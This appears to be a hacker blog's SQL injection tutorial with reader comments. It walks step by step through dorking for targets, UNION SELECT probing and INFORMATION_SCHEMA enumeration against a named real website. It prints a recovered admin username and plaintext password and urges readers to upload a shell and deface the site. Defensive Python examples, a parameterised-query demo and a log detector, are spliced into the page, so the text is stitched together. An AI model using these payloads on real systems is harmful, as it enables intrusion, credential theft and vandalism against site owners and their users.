SQL Injection

hello all

today I'm going to show you how the SQL injection process goes
STEP BY STEP

############################################################
FIRST : How to find VULN. sites for SQL-i :-
-we can find VULN. sites using google dorks like :

Code:
inurl:index.php?id=
inurl:article.php?id=
allinurl:news.php?id=
inurl:shop.php?cat=

############################################################

SECOND : How to know if the site is VULN. or not :-
-we can know if the site is VULN. to SQL-i by adding ' at the end of the link, for example
Code:
http://www.walnutacres.com/news_view.php?id=40
to
Code:
http://www.walnutacres.com/news_view.php?id=40'

if we get an error message like:
Code:
Warning: mysql_fetch_assoc(), Warning: mysql_fetch_array(), mysql_num_rows(), mysql error, mysql_query, mysql_fetch, mysql_connect
or the page disappears (comes back blank), then it's VULN. to SQL-i
if nothing happens, then find another one
but in the example I gave above the page disappeared, so it's VULN.!!

############################################################

THIRD : Finding how many VULN. columns we have, so we type :
Code:
+ORDER+BY+number
so let's do it on our target site
Quote:
http://www.walnutacres.com/news_view.php...ORDER+BY+1 <= no blank page
http://www.walnutacres.com/news_view.php...ORDER+BY+2 <= no blank page
http://www.walnutacres.com/news_view.php...ORDER+BY+3 <= no blank page
http://www.walnutacres.com/news_view.php...ORDER+BY+4 <= BLANK PAGE!
So now we have 3 VULN. columns (ORDER BY 4 gives a blank page because the query has no fourth column).
so what next?
FOURTH : Selecting the columns with UNION SELECT
Now we select them all with the UNION SELECT command
so it will be like :
Code:
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+1,2,3--
DO NOT forget to put '--' at the end of the URL and '-' after id= (the '-' makes the original id match nothing, so the page shows the UNION row instead)
So back to our target: after selecting them all and adding '-' after id= and '--' at the end we get this on the page :
Quote:
1
Dec 31, 1969
2
so we have 1 & 2 as the VULN. columns (the ones displayed on the page).

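As an added example (not code from the original post), the lookup behind a news_view.php?id= page is reproduced in Python against an in-memory SQLite table (a constructed stand-in; the three-column table is an assumption matching the ORDER BY result above). It shows why ORDER BY 4 and a stray quote break the page, why -40 UNION SELECT 1,2,3-- returns the injected row, and how casting the id to an integer and binding it as a parameter stops all three.

```python
import sqlite3

# Constructed stand-in for the news_view.php?id= lookup: a three-column table,
# matching the three columns found by the ORDER BY probe above (assumption).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO news VALUES (40, 'Harvest update', 'constructed sample row')")
    return conn

def fetch_vulnerable(conn, raw_id):
    """String concatenation: whatever arrives in ?id= becomes part of the SQL text."""
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def vulnerable_breaks(conn, raw_id):
    """True when the concatenated query errors out: the 'blank page' signal used above."""
    try:
        fetch_vulnerable(conn, raw_id)
        return False
    except sqlite3.Error:
        return True

def fetch_hardened(conn, raw_id):
    """Validate the type first, then bind the value; the SQL text never changes."""
    try:
        news_id = int(raw_id)
    except ValueError:
        return []  # a real handler would answer HTTP 400 here
    return conn.execute("SELECT id, title, body FROM news WHERE id = ?", (news_id,)).fetchall()

def demo():
    conn = make_db()
    union = "-40 UNION SELECT 1,2,3--"  # the step-three payload from this page, URL-decoded
    return {
        "order_by_3_breaks": vulnerable_breaks(conn, "40 ORDER BY 3"),
        "order_by_4_breaks": vulnerable_breaks(conn, "40 ORDER BY 4"),
        "quote_breaks": vulnerable_breaks(conn, "40'"),
        "vulnerable_union": fetch_vulnerable(conn, union),
        "hardened_union": fetch_hardened(conn, union),
        "hardened_normal": fetch_hardened(conn, "40"),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```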
############################################################

FIFTH : Getting MySQL info

1- getting the MySQL user :
we replace the number "1" in the URL with user() :
Code:
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+user(),2,3--
we got :
Quote:
walnut_db@bolwebserv2.hvntdom.hain-celestial.com
2- getting the MySQL database name: we replace user() with database() :
Code:
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+database(),2,3--
we got :
Quote:
walnut_live
3- getting the MySQL version: we replace database() with @@version or version()
Code:
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+version(),2,3--
or
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+@@version,2,3--
we got :
Quote:
5.0.77-log
ok now let's get the MySQL tables

##########################################################

OK, now we will replace version() or @@version with group_concat(table_name)
and
add this at the end of the URL, before the '--' :
Code:
+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()
so it will be like :
Code:
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+group_concat(table_name),2,3+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
OK now we got all the table names in that database and they are :
Quote:
faq,faq_rot,hp,mail,pr,pr_attach,product,product_nutrition,state_name,stores,users,zipcodes
as you can see we have a table called "users" and that table might contain the usernames & passwords
OK guys, now we have the table names, let's get the column names
now we edit our URL like this :
we replace :
Code:
group_concat(table_name)
with
group_concat(column_name)
AND we edit this :
Code:
FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
and turn it into :
Code:
FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--

so our URL will be like this :
Code:
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+group_concat(column_name),2,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--
now we got A LOT of columns and we only want the columns in the "users" table, so what can we do?

###########################################################

Now to get the columns in the "users" table we can use the MySQL CHAR() code; to get that code use the Mozilla add-on called "HackBar",
SO now "users" in CHAR code =
Code:
CHAR(117, 115, 101, 114, 115)
So now we replace DATABASE() at the end of the URL with the CHAR code and we change this :
Code:
FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA
to
FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME

so as a final result

our URL will be like this :
Code:
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+group_concat(column_name),2,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(117, 115, 101, 114, 115)--
and now we have the columns in the "users" table and they are :
Code:
id,user,pass,active,acl_cms,acl_cor,acl_str,acl_umgr,acl_cms_pr,acl_cms_faq,acl_cms_prod,acl_cms_store,acl_cms_hp,id,user,pass,active,acl_cms,acl_cor,acl_str,acl_umgr,acl_cms_pr,acl_cms_faq,acl_cms_prod,acl_cms_store,acl_cms_hp
A LOT of them, right?
but all we need is the first three : id,user,pass

#################################################################

now we will edit the URL again and change :
Code:
group_concat(column_name)
to
group_concat(id,0x3a,user,0x3a,pass)
(0x3a is the ':' separator between the three values)
and we replace this :
Code:
+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(117,%20115,%20101,%20114,%20115)--
with this :
Code:
+FROM+users

and our URL will be like :
Code:
http://www.walnutacres.com/news_view.php?id=-40+UNION+SELECT+group_concat(id,0x3a,user,0x3a,pass),2,3++FROM+users

and this will appear on the page :
Quote:
11:webmaster:Tree!House
Congrats xD, we have the admin's username and password, which are :
USERNAME : webmaster
PASSWORD : Tree!House
ok now you should find the admin page, log in as the admin, upload the shell and deface!
and you can find the admin page through online admin finders or any program or script
for example :
http://sc0rpion.ir/af/
Happy ha©king
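From the defender's side, an added example (not part of the tutorial) that scans constructed web-server access-log lines for the probe sequence this page walks through (quote test, ORDER BY enumeration, UNION SELECT, INFORMATION_SCHEMA reads, group_concat/version/user()/database() extraction) and flags a client only once it has hit several distinct stages; the log lines, client IPs and timestamps are placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines replaying the probe sequence from this
# tutorial; the client IPs and timestamps are placeholders, not values from the page.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2012:13:55:01 +0000] "GET /news_view.php?id=40 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2012:13:55:09 +0000] "GET /news_view.php?id=40' HTTP/1.1" 200 312
203.0.113.7 - - [10/Oct/2012:13:55:20 +0000] "GET /news_view.php?id=40+ORDER+BY+1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2012:13:55:25 +0000] "GET /news_view.php?id=40+ORDER+BY+4 HTTP/1.1" 200 312
203.0.113.7 - - [10/Oct/2012:13:56:02 +0000] "GET /news_view.php?id=-40+UNION+SELECT+1,2,3-- HTTP/1.1" 200 4800
203.0.113.7 - - [10/Oct/2012:13:57:40 +0000] "GET /news_view.php?id=-40+UNION+SELECT+group_concat(table_name),2,3+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- HTTP/1.1" 200 4900
198.51.100.4 - - [10/Oct/2012:14:01:11 +0000] "GET /news_view.php?id=41 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')

# One signature per stage of the walkthrough; they run on the URL-decoded request path.
SIGNATURES = {
    "quote_probe": re.compile(r"[?&]\w+=-?\d+'$"),
    "order_by_enum": re.compile(r"\bORDER\s+BY\s+\d+", re.I),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "schema_read": re.compile(r"\bINFORMATION_SCHEMA\.(?:TABLES|COLUMNS)\b", re.I),
    "data_extract": re.compile(r"\bgroup_concat\s*\(|@@version|\b(?:user|database|version)\(\)", re.I),
}

def classify(line):
    """Return (client_ip, matched_stages, response_bytes) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, path, _status, size = m.groups()
    decoded = unquote_plus(path)  # '+' and %xx encoding hide keywords from naive matching
    return ip, [name for name, rx in SIGNATURES.items() if rx.search(decoded)], int(size)

def detect(log_text, min_stages=2):
    """Clients that hit at least min_stages distinct stages: a probe sequence, not one stray hit."""
    by_ip = defaultdict(set)
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[1]:
            by_ip[parsed[0]].update(parsed[1])
    return {ip: sorted(stages) for ip, stages in by_ip.items() if len(stages) >= min_stages}

if __name__ == "__main__":
    for ip, stages in detect(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

The response size column is kept in classify() so a deployment can add the page's other tell, the sudden drop in size (the "blank page") on the ORDER BY and quote probes.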


TUT BY Dr.Z0mbie 

5 comments:

  1. Great Tutorial Bro!
    nice job, keep it up bro

  2. That website is confusing people because it is not working when we find tables, so please change that website to an example or give another one...

  3. Anyway, very nice tutorial; just change that website, otherwise it is a great job :)

    Replies
    1. my bad :) the link was wrong.. edited now :P

  4. This comment has been removed by the author.